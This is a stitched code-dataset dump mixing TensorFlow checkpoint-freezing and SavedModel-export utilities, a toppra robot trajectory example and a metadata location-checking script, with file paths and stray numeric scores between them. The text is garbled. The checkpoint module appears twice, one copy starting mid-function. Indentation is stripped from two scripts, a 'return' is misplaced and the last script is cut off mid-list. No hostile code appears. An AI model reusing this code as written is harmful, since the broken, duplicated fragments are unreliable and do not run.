    extra_tags['tag/launch_cmd'] = [' '.join(sys.argv)]
    # Importing in a new graph (nodes get an 'import/' name prefix)
    output_graph = tf.Graph()
    with output_graph.as_default():
        tf.import_graph_def(output_graph_def)
    # Finding placeholders, features, and outputs.
    # Collection keys follow a naming convention: 'feature_<name>' / 'placeholder_<name>';
    # every other named entry becomes a candidate output tensor.
    features, placeholders, outputs = {}, {}, {}
    collection_keys = graph.get_all_collection_keys()
    for key in collection_keys:
        node = graph.get_collection(key)
        if isinstance(node, list) and node:             # If list, getting first element
            node = node[0]
        if key.startswith('feature'):
            features[key.replace('feature_', '')] = output_graph.get_tensor_by_name('import/' + node.name)
        elif key.startswith('placeholder'):
            placeholders[key.replace('placeholder_', '')] = output_graph.get_tensor_by_name('import/' + node.name)
        elif hasattr(node, 'name'):
            try:
                outputs[key] = output_graph.get_tensor_by_name('import/' + node.name)
            except (KeyError, ValueError):
                # Node was pruned during freezing - not exposed as an output
                continue
    # Adding extra tags (plain values carried over from the source collections)
    for key in extra_tags:
        for value in extra_tags[key]:
            output_graph.add_to_collection(key, value)
    # Converting sparse fields
    proto_fields = BaseBuilder.parse_sparse_fields(proto_fields)
    # Building signature - one SignatureDef per method declared by the adapter
    signature_def = {}
    for method_name in signature:
        method_placeholders = signature.get(method_name).get('placeholders', {})
        method_outputs = signature.get(method_name).get('outputs', [])
        # Skipping method if we are missing some outputs
        missing_outputs = [output_name for output_name in method_outputs if output_name not in outputs]
        if missing_outputs:
            LOGGER.warning('Unable to build method %s using the provided signature.', method_name)
            continue
        # Inputs are the proto-declared features plus the method's own placeholders
        signature_inputs = {feature_name: build_tensor_info(features[feature_name]) for feature_name in features
                            if feature_name in proto_fields}
        for ph_name in method_placeholders:
            signature_inputs[ph_name] = build_tensor_info(placeholders[ph_name])
        # Output names are prefixed with a zero-padded index to preserve their declared order
        signature_outputs = {'%03d_%s' % (output_id, output_name): build_tensor_info(outputs[output_name])
                             for output_id, output_name in enumerate(method_outputs)}
        signature_def[method_name] = signature_def_utils.build_signature_def(inputs=signature_inputs,
                                                                             outputs=signature_outputs,
                                                                             method_name=PREDICT_METHOD_NAME)
    # Saving to disk
    with output_graph.as_default():
        # Temp dir sits next to the target: '<parent>/__<version>__'
        temp_model_path = '/'.join(saved_model_path.split('/')[:-1] + ['__%s__' % saved_model_path.split('/')[-1]])
        # Deleting from disk to avoid 'Directory already exists'
        shutil.rmtree(saved_model_path, ignore_errors=True)
        shutil.rmtree(temp_model_path, ignore_errors=True)
        # Saving to a temporary path, to make sure the serving does not try to load the version before it is ready
        builder = saved_model_builder.SavedModelBuilder(temp_model_path)
        builder.add_meta_graph_and_variables(session,
                                             [tag_constants.SERVING],
                                             signature_def_map=signature_def,
                                             clear_devices=True)
        builder.save()
        # Renaming to the correct path
        shutil.move(temp_model_path, saved_model_path)
    # Returning the *source* graph/session pair (not the frozen output_graph)
    return graph, session
def load_frozen_graph(frozen_graph_path, graph=None, session=None):
    """ Loads a frozen graph from disk
        :param frozen_graph_path: The path where the frozen graph is located
        :param graph: The graph object where to load the model. A new graph will be created if not provided.
        :param session: The session object to use to load the model. A new session will be created if not provided.
        :return: The graph and the session object used to load the frozen graph.
        :type graph: tensorflow.python.framework.ops.Graph
        :type session: tensorflow.python.client.session.Session
    """
    # Deferred import so TensorFlow is only loaded when this function is actually used
    from diplomacy_research.utils.tensorflow import tf, tf_logging
    # Making sure the path exists - including the path in the exception for easier debugging
    if not os.path.exists(frozen_graph_path):
        LOGGER.error('The frozen graph %s does not exist.', frozen_graph_path)
        raise FileNotFoundError(frozen_graph_path)
    # Load the frozen (meta) graph into a TF graph
    graph = tf.Graph() if graph is None else graph
    with graph.as_default():
        session = tf.Session(graph=graph) if session is None else session
        # Not showing "Saver not created because there are no variables in the graph to restore" messages.
        # try/finally guarantees verbosity is restored even when import_meta_graph raises,
        # instead of leaving the process stuck at 'ERROR' verbosity.
        tf_logging.set_verbosity('ERROR')
        try:
            tf.train.import_meta_graph(frozen_graph_path, clear_devices=True)
        finally:
            tf_logging.set_verbosity('INFO')
    return graph, session
def get_constructors_from_frozen_graph(model_path):
    """ Finds the BaseDatasetBuilder and the PolicyAdapter from a frozen checkpoint from disk
        :param model_path: The path to the frozen checkpoint
        :return: The BaseDatasetBuilder and the PolicyAdapter object linked to this model, otherwise (None, None)
    """
    base_dir = None
    model_name = None
    # Making sure model exists
    if not os.path.exists(model_path):
        LOGGER.info('Unable to find model at %s', model_path)
        return None, None
    # Loading graph (session is not needed, only the collections are inspected)
    graph, _ = load_frozen_graph(model_path)
    # Detecting model type: every 'tag/' collection key is compared against the known
    # MODEL_PATHS fragments; the last matching tag wins (no early break).
    # NOTE(review): this assumes a tag key embeds the model path - confirm against freeze-time tags.
    tags = sorted([key for key in graph.get_all_collection_keys() if 'tag/' in key])
    for tag_name in tags:
        if 'tag' in tag_name:
            for search_key in MODEL_PATHS:
                if search_key in tag_name:
                    base_dir = MODEL_PATHS[search_key]
                    model_name = tag_name
    # No base dir found
    if base_dir is None or model_name is None:
        LOGGER.info('Unable to detect the model used to generate this file.')
        return None, None
    # Loading the base dataset builder, and the policy adapter by dotted path (pydoc.locate)
    base_dataset_builder = locate('%s.BaseDatasetBuilder' % base_dir.replace('/', '.'))
    policy_adapter = locate('%s.PolicyAdapter' % base_dir.replace('/', '.'))
    # Returning
return base_dataset_builder, policy_adapter | diplomacy_research/utils/checkpoint.py | from datetime import datetime
import glob
import logging
import os
from pydoc import locate
import shutil
import sys
import time
from pytz import timezone
from diplomacy_research.models.datasets.base_builder import BaseBuilder
# Constants
LOGGER = logging.getLogger(__name__)        # Module-level logger
# Maps a path fragment (matched against the frozen graph's 'tag/' collection keys) to the
# package directory containing the corresponding BaseDatasetBuilder / PolicyAdapter classes.
MODEL_PATHS = {'/token_based/v': 'diplomacy_research/models/policy/token_based',
               '/order_based/v': 'diplomacy_research/models/policy/order_based'}
def load_graph_from_ckpt(checkpoint_path, meta_graph_path=None, graph=None, session=None):
    """ Builds a graph and a session from a specific checkpoint
        This loads the model into a new graph, and doesn't affect the default graph
        :param checkpoint_path: The checkpoint path. Can be a checkpoint directory, or a specific checkpoint in
                                that directory
        :param meta_graph_path: (Optional) The path to the saved meta graph (.meta). Will be detected automatically
                                if not provided
        :param graph: The graph object where to load the model. A new graph will be created if not provided.
        :param session: The session object to use to load the model. A new session will be created if not provided.
        :return: The graph and the session object where the checkpoint was loaded.
        :type graph: tensorflow.python.framework.ops.Graph
        :type session: tensorflow.python.client.session.Session
    """
    # Deferred import so TensorFlow is only loaded when this function is actually used
    from diplomacy_research.utils.tensorflow import tf

    def _newest_meta_graph(folder):
        """ Returns the most recently created '*.meta' file in the folder.
            (Was previously triplicated inline across the three branches below.) """
        return max(glob.iglob(os.path.join(folder, '*.meta')), key=os.path.getctime)

    dir_path, filename = os.path.split(checkpoint_path)

    # checkpoint_path is a directory - Loading latest checkpoint in directory
    if os.path.isdir(checkpoint_path):
        checkpoint = tf.train.latest_checkpoint(checkpoint_path)
        if meta_graph_path is None:
            meta_graph_path = _newest_meta_graph(checkpoint_path)

    # checkpoint_path is the 'checkpoint' index file - Loading latest checkpoint in its directory
    elif filename == 'checkpoint':
        checkpoint = tf.train.latest_checkpoint(dir_path, 'checkpoint')
        if meta_graph_path is None:
            meta_graph_path = _newest_meta_graph(dir_path)

    # Loading a specific checkpoint
    else:
        # Removing a trailing extension (e.g. '.meta', '.index') so only 'name.ckpt-123' remains
        if len(filename.split('.')) > 2:
            checkpoint_path = os.path.join(dir_path, '.'.join(filename.split('.')[:2]))
        checkpoint = checkpoint_path
        if meta_graph_path is None:
            # Preferring the checkpoint's own .meta file; falling back to the newest in the folder
            if os.path.exists('{}.meta'.format(checkpoint_path)):
                meta_graph_path = '{}.meta'.format(checkpoint_path)
            else:
                meta_graph_path = _newest_meta_graph(dir_path)

    # Loading the checkpoint in the graph
    graph = tf.Graph() if graph is None else graph
    with graph.as_default():
        session = tf.Session(graph=graph) if session is None else session
        saver = tf.train.import_meta_graph(meta_graph_path)
        saver.restore(session, checkpoint)

    # Returning graph and session
    return graph, session
def freeze_graph(frozen_dir, version_id, graph, session, history_saver=None):
    """ Writes an optional checkpoint, then a frozen copy of the graph, to disk
        :param frozen_dir: Directory where the checkpoint and the frozen graph are written.
        :param version_id: Integer version id appended to each file name.
        :param graph: The graph to freeze.
        :param session: The session holding the graph's current variable values.
        :param history_saver: Optional saver used to keep historical checkpoints. When omitted,
                              no checkpoint is written and the graph is only frozen.
        :return: Nothing
        :type graph: tensorflow.python.framework.ops.Graph
        :type session: tensorflow.python.client.session.Session
    """
    # Versioned target paths for this freeze operation
    ckpt_target = os.path.join(frozen_dir, 'checkpoint-v%09d' % version_id)
    frozen_target = os.path.join(frozen_dir, 'frozen_graph-v%09d.pb' % version_id)

    # Creating the output directory on first use
    if not os.path.exists(frozen_dir):
        os.makedirs(frozen_dir, exist_ok=True)

    # Writing a historical checkpoint when a saver was provided
    if history_saver is not None:
        with graph.as_default():
            history_saver.save(session, ckpt_target)

    # Freezing - checkpoint_path is None since the live graph/session pair is passed directly
    convert_ckpt_to_frozen_graph(checkpoint_path=None,
                                 frozen_graph_path=frozen_target,
                                 graph=graph,
                                 session=session)
def build_saved_model(saved_model_dir, version_id, signature, proto_fields, graph, session, history_saver=None):
    """ Writes an optional checkpoint, then converts the graph to a SavedModel on disk
        :param saved_model_dir: Directory where the checkpoint and the SavedModel are written.
        :param version_id: Integer version id of the SavedModel to save.
        :param signature: The output of adapter.get_signature() - signature of all the possible calls.
        :param proto_fields: Dictionary mapping feature names to their proto field description.
        :param graph: The graph to save.
        :param session: The session holding the graph's current variable values.
        :param history_saver: Optional saver used to keep historical checkpoints. When omitted,
                              no checkpoint is written and the graph is only converted.
        :return: Nothing
        :type graph: tensorflow.python.framework.ops.Graph
        :type session: tensorflow.python.client.session.Session
    """
    # Versioned target paths - the SavedModel itself lives in a bare '%09d' sub-directory
    ckpt_target = os.path.join(saved_model_dir, 'checkpoint-v%09d' % version_id)
    model_target = os.path.join(saved_model_dir, '%09d' % version_id)

    # Creating the output directory on first use
    if not os.path.exists(saved_model_dir):
        os.makedirs(saved_model_dir, exist_ok=True)

    # Writing a historical checkpoint when a saver was provided
    if history_saver is not None:
        with graph.as_default():
            history_saver.save(session, ckpt_target)

    # Converting - checkpoint_path is None since the live graph/session pair is passed directly
    convert_ckpt_to_saved_model(checkpoint_path=None,
                                saved_model_path=model_target,
                                signature=signature,
                                proto_fields=proto_fields,
                                graph=graph,
                                session=session)
def convert_ckpt_to_frozen_graph(checkpoint_path, frozen_graph_path, meta_graph_path=None, graph=None, session=None):
    """ Converts a checkpoint to a frozen (meta) graph with fixed weights for faster inference
        :param checkpoint_path: The path to the checkpoint file (can be a directory, or a checkpoint file)
        :param frozen_graph_path: The path where to save the frozen graph
        :param meta_graph_path: Optional. The path of the meta_graph. Will be detected automatically if not provided.
        :param graph: The graph object where to load the model. A new graph will be created if not provided.
        :param session: The session object to use to load the model. A new session will be created if not provided.
        :return: The graph and the session object used to load the checkpoint.
        :type graph: tensorflow.python.framework.ops.Graph
        :type session: tensorflow.python.client.session.Session
    """
    # Deferred import so TensorFlow is only loaded when this function is actually used
    from diplomacy_research.utils.tensorflow import tf, graph_util, variables
    # Loading the checkpoint from disk (skipped when a live graph/session pair was supplied)
    if graph is None or session is None:
        graph, session = load_graph_from_ckpt(checkpoint_path,
                                              meta_graph_path=meta_graph_path,
                                              graph=graph,
                                              session=session)
    # Converting graph to constant
    # Keeping only collection keys that look like inference outputs: variables, train steps,
    # ops, contexts, private ('_'-prefixed) keys, tensor arrays, summaries and trainable
    # flags are all filtered out.
    input_graph_def = graph.as_graph_def()
    output_keys = [k for k in graph.get_all_collection_keys() if ('variable' not in k.lower()
                                                                  and '_step' not in k
                                                                  and '_op' not in k
                                                                  and '_context' not in k
                                                                  and not k.startswith('_')
                                                                  and not k.endswith('_ta')
                                                                  and 'summaries' not in k
                                                                  and 'is_trainable' not in k)]
    # Making sure we are saving an iterator, otherwise the model will not be usable
    if not [key for key in output_keys if 'iterator_resource' in key]:
        LOGGER.error('Trying to freeze a model without an "iterator_resource" key. Model will not be usable. Aborting')
        raise RuntimeError('Missing "iterator_resource" to freeze model.')
    # Finding output nodes and extra tags.
    # Collection entries with a .name attribute are graph nodes to keep; anything else
    # (plain Python values) is preserved as an "extra tag" re-attached after freezing.
    extra_tags = {}
    output_nodes = []
    for key in output_keys:
        nodes_in_collection = graph.get_collection(key)
        for node in nodes_in_collection:
            if isinstance(node, variables.PartitionedVariable):
                # Partitioned variables expose their shards through a private list
                output_nodes += [var.name for var in node._get_variable_list()]     # pylint: disable=protected-access
            elif hasattr(node, 'name'):
                output_nodes += [node.name]
            else:
                extra_tags.setdefault(key, [])
                extra_tags[key] += [node]
    # Freezing graph - converts every variable reachable from the output nodes into a constant.
    # convert_variables_to_constants expects op names, hence the ':0'-suffix stripping.
    output_graph_def = graph_util.convert_variables_to_constants(session,
                                                                 input_graph_def,
                                                                 [node.split(':')[0] for node in output_nodes])
    # Storing date/time, original filename, and launch args as provenance tags
    created_date = datetime.fromtimestamp(time.time(), timezone('America/Montreal'))
    extra_tags['tag/created_date'] = [created_date.strftime("%Y-%m-%d %H:%M:%S %Z")]
    extra_tags['tag/filename'] = [frozen_graph_path.split('/')[-1]]
    extra_tags['tag/launch_cmd'] = [' '.join(sys.argv)]
    # Importing in a new graph (nodes get an 'import/' name prefix)
    output_graph = tf.Graph()
    with output_graph.as_default():
        tf.import_graph_def(output_graph_def)
    # Transferring collections from the source graph to the frozen graph
    collection_keys = graph.get_all_collection_keys()
    for key in collection_keys:
        if 'variable' in key.lower() or '_op' in key:
            continue
        nodes = graph.get_collection(key)
        for node in nodes:
            if hasattr(node, 'name'):
                try:
                    # Appending ':0' when the name has no output index, to form a valid tensor name
                    tensor_name = 'import/{}{}'.format(node.name, ':0' if ':' not in node.name else '')
                    tensor_node = output_graph.get_tensor_by_name(tensor_name)
                    output_graph.add_to_collection(key, tensor_node)
                except KeyError:
                    # Node was pruned during freezing - silently dropped from the collection
                    pass
    # Adding extra tags (plain values carried over from the source collections)
    for key in extra_tags:
        for value in extra_tags[key]:
            output_graph.add_to_collection(key, value)
    # Saving the frozen graph to disk
    with output_graph.as_default():
        tf.train.export_meta_graph(frozen_graph_path,
                                   graph_def=output_graph.as_graph_def(),
                                   clear_devices=True)
    # Returning the *source* graph/session pair (not the frozen output_graph)
    return graph, session
def convert_ckpt_to_saved_model(checkpoint_path, saved_model_path, signature, proto_fields, meta_graph_path=None,
                                graph=None, session=None):
    """ Converts a checkpoint to a SavedModel with fixed weights for faster inference
        :param checkpoint_path: The path to the checkpoint file (can be a directory, or a checkpoint file)
        :param saved_model_path: The path where to save the SavedModel
        :param signature: The output of adapter.get_signature() - signature of all the possible calls
        :param proto_fields: A dictionary of features name with their proto field description
        :param meta_graph_path: Optional. The path of the meta_graph. Will be detected automatically if not provided.
        :param graph: The graph object where to load the model. A new graph will be created if not provided.
        :param session: The session object to use to load the model. A new session will be created if not provided.
        :return: The graph and the session object used to load the checkpoint.
        :type graph: tensorflow.python.framework.ops.Graph
        :type session: tensorflow.python.client.session.Session
    """
    # Deferred import so TensorFlow is only loaded when this function is actually used
    from diplomacy_research.utils.tensorflow import tf, graph_util, build_tensor_info, saved_model_builder, \
        signature_def_utils, tag_constants, variables, PREDICT_METHOD_NAME
    # Loading the checkpoint from disk (skipped when a live graph/session pair was supplied)
    if graph is None or session is None:
        graph, session = load_graph_from_ckpt(checkpoint_path,
                                              meta_graph_path=meta_graph_path,
                                              graph=graph,
                                              session=session)
    # Converting graph to constant
    # Keeping only collection keys that look like inference outputs: variables, train steps,
    # ops, contexts, private ('_'-prefixed) keys, tensor arrays, summaries and trainable
    # flags are all filtered out.
    input_graph_def = graph.as_graph_def()
    output_keys = [k for k in graph.get_all_collection_keys() if ('variable' not in k.lower()
                                                                  and '_step' not in k
                                                                  and '_op' not in k
                                                                  and '_context' not in k
                                                                  and not k.startswith('_')
                                                                  and not k.endswith('_ta')
                                                                  and 'summaries' not in k
                                                                  and 'is_trainable' not in k)]
    # Finding output nodes and extra tags.
    # Collection entries with a .name attribute are graph nodes to keep; anything else
    # (plain Python values) is preserved as an "extra tag" re-attached after freezing.
    extra_tags = {}
    output_nodes = []
    for key in output_keys:
        nodes_in_collection = graph.get_collection(key)
        for node in nodes_in_collection:
            if isinstance(node, variables.PartitionedVariable):
                # Partitioned variables expose their shards through a private list
                output_nodes += [var.name for var in node._get_variable_list()]     # pylint: disable=protected-access
            elif hasattr(node, 'name'):
                output_nodes += [node.name]
            else:
                extra_tags.setdefault(key, [])
                extra_tags[key] += [node]
    # Converting graph to constant - convert_variables_to_constants expects op names,
    # hence the ':0'-suffix stripping.
    output_graph_def = graph_util.convert_variables_to_constants(session,
                                                                 input_graph_def,
                                                                 [node.split(':')[0] for node in output_nodes])
    # Storing date/time, original filename, and launch args as provenance tags
    created_date = datetime.fromtimestamp(time.time(), timezone('America/Montreal'))
    extra_tags['tag/created_date'] = [created_date.strftime("%Y-%m-%d %H:%M:%S %Z")]
    extra_tags['tag/filename'] = [saved_model_path.split('/')[-1]]
    extra_tags['tag/launch_cmd'] = [' '.join(sys.argv)]
    # Importing in a new graph (nodes get an 'import/' name prefix)
    output_graph = tf.Graph()
    with output_graph.as_default():
        tf.import_graph_def(output_graph_def)
    # Finding placeholders, features, and outputs.
    # Collection keys follow a naming convention: 'feature_<name>' / 'placeholder_<name>';
    # every other named entry becomes a candidate output tensor.
    features, placeholders, outputs = {}, {}, {}
    collection_keys = graph.get_all_collection_keys()
    for key in collection_keys:
        node = graph.get_collection(key)
        if isinstance(node, list) and node:             # If list, getting first element
            node = node[0]
        if key.startswith('feature'):
            features[key.replace('feature_', '')] = output_graph.get_tensor_by_name('import/' + node.name)
        elif key.startswith('placeholder'):
            placeholders[key.replace('placeholder_', '')] = output_graph.get_tensor_by_name('import/' + node.name)
        elif hasattr(node, 'name'):
            try:
                outputs[key] = output_graph.get_tensor_by_name('import/' + node.name)
            except (KeyError, ValueError):
                # Node was pruned during freezing - not exposed as an output
                continue
    # Adding extra tags (plain values carried over from the source collections)
    for key in extra_tags:
        for value in extra_tags[key]:
            output_graph.add_to_collection(key, value)
    # Converting sparse fields
    proto_fields = BaseBuilder.parse_sparse_fields(proto_fields)
    # Building signature - one SignatureDef per method declared by the adapter
    signature_def = {}
    for method_name in signature:
        method_placeholders = signature.get(method_name).get('placeholders', {})
        method_outputs = signature.get(method_name).get('outputs', [])
        # Skipping method if we are missing some outputs
        missing_outputs = [output_name for output_name in method_outputs if output_name not in outputs]
        if missing_outputs:
            LOGGER.warning('Unable to build method %s using the provided signature.', method_name)
            continue
        # Inputs are the proto-declared features plus the method's own placeholders
        signature_inputs = {feature_name: build_tensor_info(features[feature_name]) for feature_name in features
                            if feature_name in proto_fields}
        for ph_name in method_placeholders:
            signature_inputs[ph_name] = build_tensor_info(placeholders[ph_name])
        # Output names are prefixed with a zero-padded index to preserve their declared order
        signature_outputs = {'%03d_%s' % (output_id, output_name): build_tensor_info(outputs[output_name])
                             for output_id, output_name in enumerate(method_outputs)}
        signature_def[method_name] = signature_def_utils.build_signature_def(inputs=signature_inputs,
                                                                             outputs=signature_outputs,
                                                                             method_name=PREDICT_METHOD_NAME)
    # Saving to disk
    with output_graph.as_default():
        # Temp dir sits next to the target: '<parent>/__<version>__'
        temp_model_path = '/'.join(saved_model_path.split('/')[:-1] + ['__%s__' % saved_model_path.split('/')[-1]])
        # Deleting from disk to avoid 'Directory already exists'
        shutil.rmtree(saved_model_path, ignore_errors=True)
        shutil.rmtree(temp_model_path, ignore_errors=True)
        # Saving to a temporary path, to make sure the serving does not try to load the version before it is ready
        builder = saved_model_builder.SavedModelBuilder(temp_model_path)
        builder.add_meta_graph_and_variables(session,
                                             [tag_constants.SERVING],
                                             signature_def_map=signature_def,
                                             clear_devices=True)
        builder.save()
        # Renaming to the correct path
        shutil.move(temp_model_path, saved_model_path)
    # Returning the *source* graph/session pair (not the frozen output_graph)
    return graph, session
def load_frozen_graph(frozen_graph_path, graph=None, session=None):
    """ Loads a frozen graph from disk
        :param frozen_graph_path: The path where the frozen graph is located
        :param graph: The graph object where to load the model. A new graph will be created if not provided.
        :param session: The session object to use to load the model. A new session will be created if not provided.
        :return: The graph and the session object used to load the frozen graph.
        :type graph: tensorflow.python.framework.ops.Graph
        :type session: tensorflow.python.client.session.Session
    """
    # Deferred import so TensorFlow is only loaded when this function is actually used
    from diplomacy_research.utils.tensorflow import tf, tf_logging
    # Making sure the path exists - including the path in the exception for easier debugging
    if not os.path.exists(frozen_graph_path):
        LOGGER.error('The frozen graph %s does not exist.', frozen_graph_path)
        raise FileNotFoundError(frozen_graph_path)
    # Load the frozen (meta) graph into a TF graph
    graph = tf.Graph() if graph is None else graph
    with graph.as_default():
        session = tf.Session(graph=graph) if session is None else session
        # Not showing "Saver not created because there are no variables in the graph to restore" messages.
        # try/finally guarantees verbosity is restored even when import_meta_graph raises,
        # instead of leaving the process stuck at 'ERROR' verbosity.
        tf_logging.set_verbosity('ERROR')
        try:
            tf.train.import_meta_graph(frozen_graph_path, clear_devices=True)
        finally:
            tf_logging.set_verbosity('INFO')
    return graph, session
def get_constructors_from_frozen_graph(model_path):
    """ Finds the BaseDatasetBuilder and the PolicyAdapter from a frozen checkpoint from disk
        :param model_path: The path to the frozen checkpoint
        :return: The BaseDatasetBuilder and the PolicyAdapter object linked to this model, otherwise (None, None)
    """
    base_dir = None
    model_name = None
    # Making sure model exists
    if not os.path.exists(model_path):
        LOGGER.info('Unable to find model at %s', model_path)
        return None, None
    # Loading graph (session is not needed, only the collections are inspected)
    graph, _ = load_frozen_graph(model_path)
    # Detecting model type: every 'tag/' collection key is compared against the known
    # MODEL_PATHS fragments; the last matching tag wins (no early break).
    # NOTE(review): this assumes a tag key embeds the model path - confirm against freeze-time tags.
    tags = sorted([key for key in graph.get_all_collection_keys() if 'tag/' in key])
    for tag_name in tags:
        if 'tag' in tag_name:
            for search_key in MODEL_PATHS:
                if search_key in tag_name:
                    base_dir = MODEL_PATHS[search_key]
                    model_name = tag_name
    # No base dir found
    if base_dir is None or model_name is None:
        LOGGER.info('Unable to detect the model used to generate this file.')
        return None, None
    # Loading the base dataset builder, and the policy adapter by dotted path (pydoc.locate)
    base_dataset_builder = locate('%s.BaseDatasetBuilder' % base_dir.replace('/', '.'))
    policy_adapter = locate('%s.PolicyAdapter' % base_dir.replace('/', '.'))
    # Returning
return base_dataset_builder, policy_adapter | 0.720172 | 0.175432 |
import toppra as ta
import toppra.constraint as constraint
import toppra.algorithm as algo
import numpy as np
import matplotlib.pyplot as plt
import argparse
def main():
parser = argparse.ArgumentParser(description="An example showcasing the usage of robust constraints."
"A velocity constraint and a robust acceleration constraint"
"are considered in this script.")
parser.add_argument("-N", "--N", type=int, help="Number of segments in the discretization.", default=100)
parser.add_argument("-v", "--verbose", action="store_true", default=False)
parser.add_argument("-du", "--du", default=1e-3, type=float)
parser.add_argument("-dx", "--dx", default=5e-2, type=float)
parser.add_argument("-dc", "--dc", default=9e-3, type=float)
parser.add_argument("-so", "--solver_wrapper", default='ecos')
parser.add_argument("-i", "--interpolation_scheme", default=1, type=int)
args = parser.parse_args()
if args.verbose:
ta.setup_logging("DEBUG")
else:
ta.setup_logging("INFO")
# Parameters
N_samples = 5
dof = 7
# Random waypoints used to obtain a random geometric path.
np.random.seed(9)
way_pts = np.random.randn(N_samples, dof)
# Create velocity bounds, then velocity constraint object
vlim_ = np.random.rand(dof) * 20
vlim = np.vstack((-vlim_, vlim_)).T
# Create acceleration bounds, then acceleration constraint object
alim_ = np.random.rand(dof) * 2
alim = np.vstack((-alim_, alim_)).T
path = ta.SplineInterpolator(np.linspace(0, 1, 5), way_pts)
pc_vel = constraint.JointVelocityConstraint(vlim)
pc_acc = constraint.JointAccelerationConstraint(
alim, discretization_scheme=constraint.DiscretizationType.Interpolation)
robust_pc_acc = constraint.RobustLinearConstraint(
pc_acc, [args.du, args.dx, args.dc], args.interpolation_scheme)
instance = algo.TOPPRA([pc_vel, robust_pc_acc], path,
gridpoints=np.linspace(0, 1, args.N + 1),
solver_wrapper=args.solver_wrapper)
X = instance.compute_feasible_sets()
K = instance.compute_controllable_sets(0, 0)
_, sd_vec, _ = instance.compute_parameterization(0, 0)
X = np.sqrt(X)
K = np.sqrt(K)
plt.plot(X[:, 0], c='green', label="Feasible sets")
plt.plot(X[:, 1], c='green')
plt.plot(K[:, 0], '--', c='red', label="Controllable sets")
plt.plot(K[:, 1], '--', c='red')
plt.plot(sd_vec, label="Velocity profile")
plt.legend()
plt.title("Path-position path-velocity plot")
plt.show()
jnt_traj, aux_traj = instance.compute_trajectory(0, 0)
ts_sample = np.linspace(0, jnt_traj.duration, 100)
qs_sample = jnt_traj.evaldd(ts_sample)
plt.plot(ts_sample, qs_sample)
plt.show()
if __name__ == '__main__':
main() | examples/robust_kinematics.py | import toppra as ta
import toppra.constraint as constraint
import toppra.algorithm as algo
import numpy as np
import matplotlib.pyplot as plt
import argparse
def main():
parser = argparse.ArgumentParser(description="An example showcasing the usage of robust constraints."
"A velocity constraint and a robust acceleration constraint"
"are considered in this script.")
parser.add_argument("-N", "--N", type=int, help="Number of segments in the discretization.", default=100)
parser.add_argument("-v", "--verbose", action="store_true", default=False)
parser.add_argument("-du", "--du", default=1e-3, type=float)
parser.add_argument("-dx", "--dx", default=5e-2, type=float)
parser.add_argument("-dc", "--dc", default=9e-3, type=float)
parser.add_argument("-so", "--solver_wrapper", default='ecos')
parser.add_argument("-i", "--interpolation_scheme", default=1, type=int)
args = parser.parse_args()
if args.verbose:
ta.setup_logging("DEBUG")
else:
ta.setup_logging("INFO")
# Parameters
N_samples = 5
dof = 7
# Random waypoints used to obtain a random geometric path.
np.random.seed(9)
way_pts = np.random.randn(N_samples, dof)
# Create velocity bounds, then velocity constraint object
vlim_ = np.random.rand(dof) * 20
vlim = np.vstack((-vlim_, vlim_)).T
# Create acceleration bounds, then acceleration constraint object
alim_ = np.random.rand(dof) * 2
alim = np.vstack((-alim_, alim_)).T
path = ta.SplineInterpolator(np.linspace(0, 1, 5), way_pts)
pc_vel = constraint.JointVelocityConstraint(vlim)
pc_acc = constraint.JointAccelerationConstraint(
alim, discretization_scheme=constraint.DiscretizationType.Interpolation)
robust_pc_acc = constraint.RobustLinearConstraint(
pc_acc, [args.du, args.dx, args.dc], args.interpolation_scheme)
instance = algo.TOPPRA([pc_vel, robust_pc_acc], path,
gridpoints=np.linspace(0, 1, args.N + 1),
solver_wrapper=args.solver_wrapper)
X = instance.compute_feasible_sets()
K = instance.compute_controllable_sets(0, 0)
_, sd_vec, _ = instance.compute_parameterization(0, 0)
X = np.sqrt(X)
K = np.sqrt(K)
plt.plot(X[:, 0], c='green', label="Feasible sets")
plt.plot(X[:, 1], c='green')
plt.plot(K[:, 0], '--', c='red', label="Controllable sets")
plt.plot(K[:, 1], '--', c='red')
plt.plot(sd_vec, label="Velocity profile")
plt.legend()
plt.title("Path-position path-velocity plot")
plt.show()
jnt_traj, aux_traj = instance.compute_trajectory(0, 0)
ts_sample = np.linspace(0, jnt_traj.duration, 100)
qs_sample = jnt_traj.evaldd(ts_sample)
plt.plot(ts_sample, qs_sample)
plt.show()
if __name__ == '__main__':
main() | 0.738198 | 0.423995 |
import argparse
import pandas as pd
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description="Check for missing colors & locations",
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument('--metadata', type=str, nargs='+', required=True, help="input region adjusted metadata")
parser.add_argument('--colors', type=str, nargs='+', required=True, help="input region specific color file")
parser.add_argument('--latlong', type=str, required=True, help="input lat-long file")
args = parser.parse_args()
things_to_exclude_orig = ['Africa', 'Asia', 'South America', 'Europe',
'North America', 'Oceania', 'Grand princess cruise ship',
'diamond princess']
things_to_exclude = [x.lower() for x in things_to_exclude_orig]
all_metadatas = [pd.read_csv(met, delimiter='\t') for met in args.metadata]
metadata = pd.concat(all_metadatas, sort=False)
all_colors = [pd.read_csv(col, delimiter='\t', header=None) for col in args.colors]
colors = pd.concat(all_colors, sort=False)
latlong = pd.read_csv(args.latlong, delimiter='\t', header=None)
for geo_value in ['location', 'division', 'country']:
locs_w_color_orig = colors.loc[colors[0]==geo_value,1].values
locs_w_color = [x.lower() for x in locs_w_color_orig]
locs_w_latlong_orig = latlong.loc[latlong[0]==geo_value,1].values
locs_w_latlong = [x.lower() for x in locs_w_latlong_orig]
locs_in_meta_orig = [x for x in metadata[geo_value].unique() if not pd.isna(x)]
locs_in_meta = [x.lower() for x in locs_in_meta_orig]
missing_color_locs = [loc for loc in locs_in_meta if loc not in locs_w_color and loc not in things_to_exclude]
if missing_color_locs:
print("The following {} are missing colors:".format(geo_value))
print(missing_color_locs)
print("\n")
if geo_value != 'country':
missing_latlong_locs = [loc for loc in locs_in_meta if loc not in locs_w_latlong and loc not in things_to_exclude]
if missing_latlong_locs:
print("The following {} are missing lat-long values:".format(geo_value))
print(missing_latlong_locs)
print("\n")
print("Please remember this does *not* check lat-longs for countries!!") | scripts/check_missing_locations.py | import argparse
import pandas as pd
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description="Check for missing colors & locations",
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument('--metadata', type=str, nargs='+', required=True, help="input region adjusted metadata")
parser.add_argument('--colors', type=str, nargs='+', required=True, help="input region specific color file")
parser.add_argument('--latlong', type=str, required=True, help="input lat-long file")
args = parser.parse_args()
things_to_exclude_orig = ['Africa', 'Asia', 'South America', 'Europe',
